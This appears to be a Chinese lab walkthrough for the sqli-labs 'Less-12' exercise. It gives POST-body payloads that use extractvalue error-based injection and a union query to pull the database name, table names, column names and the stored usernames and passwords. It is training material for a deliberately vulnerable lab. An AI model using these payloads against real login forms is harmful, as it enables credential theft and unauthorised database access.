Less-12基于错误的双引号POST字符型变形的注入

方式一 extractvalue报错型

1、爆开数据库
payload "*"达到sql注入查询语句闭合！用--+反而不行

name=admin" and extractvalue(1,concat(0x7e,(select database()))) and " &passwd=admin&submit=Submit

2、爆开数据表
payload

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and " &passwd=admin&submit=Submit

3、爆开数据表
payload

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) and " &passwd=admin&submit=Submit

4、表开数据列(字段)
payload

uname=admin" and extractvalue(1,concat(0x7e,(select group_concat(username,'~',password) from users))) and " &passwd=admin&submit=Submit

方式二 union联合注入查询

爆开数据库表

uname=0") union select 1,database() --+ &passwd=admin&submit=Submit